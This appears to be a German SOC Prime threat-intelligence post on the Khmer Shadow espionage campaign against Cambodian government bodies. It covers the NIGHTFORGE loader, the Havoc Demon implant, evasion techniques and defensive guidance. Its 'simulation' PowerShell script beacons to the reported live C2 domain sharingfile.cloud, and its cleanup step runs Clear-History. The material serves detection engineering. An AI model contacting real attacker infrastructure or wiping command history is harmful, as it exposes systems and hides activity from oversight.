SOC Prime Bias: Hoch

12 Jun 2026 06:10 UTC
newspaper icon Acronis

Khmer Shadow zielt auf kambodschanische Regierungseinrichtungen in Spionagekampagne ab

Author Photo
SOC Prime Team linkedin icon Folgen
Khmer Shadow zielt auf kambodschanische Regierungseinrichtungen in Spionagekampagne ab
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Ein neu identifiziertes Bedrohungscluster, das als Khmer Shadow verfolgt wird, führt Spionage-Operationen gegen kambodschanische Regierungsorganisationen durch, insbesondere in den Bereichen Verteidigung und öffentliche Arbeiten. Die Angreifer verwenden einen benutzerdefinierten C++-Loader namens NIGHTFORGE, um eine Havoc Demon-Nutzlast direkt in den Speicher einzuschleusen. Die Kampagne nutzt auch fortschrittliche Ausweichmethoden, einschließlich NTDLL Unhooking und Hell’s Gate Systemaufrufauflösung, um die Sichtbarkeit zu reduzieren und Sicherheitskontrollen zu umgehen.

Untersuchung

Acronis TRU entdeckte zwei separate Kampagnen, die Besprechungsthema-Selbstausführende Archive als anfängliche Liefermethode verwendeten. Analysten untersuchten den NIGHTFORGE-Loader und dokumentierten seine Fähigkeit, Systemaufrufe dynamisch aufzulösen und NTDLL auszuhaken, um bösartige Aktivitäten zu verbergen. Die Untersuchung verband auch mehrere Command-and-Control-Umgebungen, indem sie auf gemeinsame JARM-Fingerabdrücke und wiederverwendete Cloudflare Origin-Zertifikate setzte.

Minderung

Organisationen sollten eine strenge Überwachung auf verdächtiges DLL Sideloading-Verhalten implementieren, besonders wenn legitime signierte Binärdateien wie VMwareNamespaceCmd.exe beteiligt sind. Verteidiger sollten auch nach unbefugten geplanten Aufgaben und ungewöhnlichen Kindprozessen, einschließlich gpupdate.exe, die von unerwarteten übergeordneten Prozessen gestartet werden, Ausschau halten. Endpunktschutz, der in der Lage ist, direkte Systemaufrufaktivitäten und speicherresidente Nutzlasten zu erkennen, kann die Abdeckung weiter verbessern.

Reaktion

Wenn Khmer Shadow-Aktivitäten erkannt werden, sollten betroffene Systeme sofort isoliert werden, um die weitere Command-and-Control-Kommunikation zu unterbrechen. Ermittler sollten eine forensische Analyse des %LOCALAPPDATA% -Verzeichnisses durchführen, um alle persistierenden VMwareNamespace-bezogenen Artefakte zu identifizieren. Netzwerkprotokolle sollten auch auf ausgehenden HTTPS-Verkehr zu den bekannten Command-and-Control-Domains überprüft werden, und die auf kompromittierten Systemen verwendeten Anmeldedaten sollten zurückgesetzt werden.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef process fill:#ccffcc classDef network fill:#ffff99 %% Node Definitions action_phishing["<b>Aktion</b> – <b id='T1566.001'>T1566.001 Spearphishing-Anhang</b><br/><b>Beschreibung</b>: Bereitstellung von bösartigen Anhängen per E-Mail.<br/><b>Datei</b>: Contact_Letter_To_Ms_Pech_ICB_Cambodia_On_Collaboration.pdf.exe"] class action_phishing action proc_sideload["<b id='T1218'>T1218 System-Binärausführungs-Proxy</b><br/><b>Beschreibung</b>: Verwendung legitimer Binärdateien zur Ausführung von bösartigem Code.<br/><b>Binärdatei</b>: VMwareNamespaceCmd.exe<br/><b>Sideloaded DLL</b>: vmtools.dll"] class proc_sideload process malware_nightforge["<b id='NIGHTFORGE'>Malware</b>: NIGHTFORGE Loader<br/><b>Aktion</b> – <b id='T1140'>T1140 Dateien oder Informationen entschleiern / decodieren</b><br/><b>Beschreibung</b>: Verwendung von benutzerdefinierter XOR-Verschlüsselung zur Decodierung von Shellcode.<br/><b>Aktion</b> – <b id='T1027.007'>T1027.007 Dynamische API-Auflösung</b><br/><b>Beschreibung</b>: Umgehung von EDR durch Hell's Gate Systemaufrufauflösung."] class malware_nightforge malware action_persistence["<b id='T1137'>T1137 Office-Anwendungs-Start</b><br/><b>Beschreibung</b>: Verwendung von COM-APIs zur Gewährleistung der Persistenz.<br/><b>Mechanismus</b>: Registrierte geplante Aufgabe namens VMwareNamespace<br/><b>Frequenz</b>: Wiederholt sich alle 10 Minuten."] class action_persistence action tool_kaynldr["<b id='KaynLdr'>Werkzeug</b>: KaynLdr<br/><b>Aktion</b> – <b id='T1620'>T1620 Reflexives Code-Loading</b><br/><b>Beschreibung</b>: Reflexives Laden der Endphase in den Speicher."] class tool_kaynldr tool malware_havoc["<b id='Havoc'>Malware</b>: Havoc Demon Implantat<br/><b>Beschreibung</b>: Endphase-Implantat läuft im Speicher."] class malware_havoc malware action_c2["<b id='T1102.002'>T1102.002 Webdienst: Bidirektionale Kommunikation</b><br/><b>Beschreibung</b>: Einrichtung von Command und Control über HTTPS POST.<br/><b>C2-URL</b>: www[.]sharingfile[.]cloud<br/><b>Umgehung</b>: Imitiert den Standard-Chrome-Browser-Verkehr."] class action_c2 network %% Connections Section %% Phishing leads to binary proxy execution action_phishing –>|leads_to| proc_sideload %% Proxy execution loads the NIGHTFORGE loader proc_sideload –>|executes| malware_nightforge %% NIGHTFORGE establishes persistence malware_nightforge –>|establishes| action_persistence %% NIGHTFORGE uses KaynLdr for reflective loading malware_nightforge –>|uses| tool_kaynldr %% KaynLdr injects Havoc Demon tool_kaynldr –>|injects| malware_havoc %% Havoc Demon communicates via C2 malware_havoc –>|establishes C2 via| action_c2 "

Angriffsablauf

Simulation-Ausführung

Voraussetzung: Die Telemetrie- & Basislinien-Vorabüberprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht in Zusammenhang stehende Beispiele führen zu Fehldiagnosen.

  • Angrifferzählung & Befehle: Ein Angreifer hat erfolgreich ein Havoc-Demon-Implantat auf einer Arbeitsstation innerhalb des Zielnetzwerks eingesetzt. Um eine Command und Control (C2) einzurichten und grundlegende Perimeter-Abwehr zu umgehen, ist das Implantat so konfiguriert, dass es mit einer bestimmten Menge an Domains kommuniziert, die in der jüngsten Bedrohungsaufklärung bezüglich Khmer Shadow-Aktivitäten identifiziert wurden. Das Implantat wird eine HTTP-GET-Anfrage an sharingfile.cloud senden, um seine Präsenz zu signalisieren und weitere Anweisungen zu erwarten. Diese Aktion zielt darauf ab, einen Proxy-Protokolleintrag zu erzeugen, der die verdächtige Domain-Zeichenkette enthält.

  • Regressionstest-Skript:

    # Simulationsskript, um die Khmer Shadow C2-Erkennungsregel auszulösen
# Dies imitiert ein C2-Check-in über eine HTTP-Anfrage an eine verdächtige Domain.

$C2_Domain = "http://sharingfile.cloud/api/v1/checkin"
$UserAgent = "Havoc-Demon-Implant-v1.0"

Write-Host "[!] Initiieren der simulierten C2-Kommunikation zu: $C2_Domain" -ForegroundColor Red

try {
    # Verwendung von Invoke-WebRequest, um die Netzwerkaktivität zu simulieren
    # Ein benutzerdefinierter User-Agent wird verwendet, um eine spezifische Tool-Signatur zu imitieren
    $response = Invoke-WebRequest -Uri $C2_Domain -UserAgent $UserAgent -Method Get -ErrorAction SilentlyContinue
    Write-Host "[+] Anfrage erfolgreich gesendet (Hinweis: Fehlschlagen wird erwartet, wenn die Domain gesichert/ offline ist)." -ForegroundColor Green
}
catch {
    Write-Host "[+] Anfrage versucht. Überprüfen Sie die Proxy-Protokolle auf Verbindungsversuch zur verdächtigen Domain." -ForegroundColor Yellow
}

  • Säuberungsbefehle:

    # Keine permanenten Änderungen durch diese Simulation vorgenommen. 
# Löschung der Befehlsverlauf zur Entfernung der Spuren der Simulation.
Clear-History
Write-Host "[+] Aufräumarbeiten abgeschlossen." -ForegroundColor Green

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten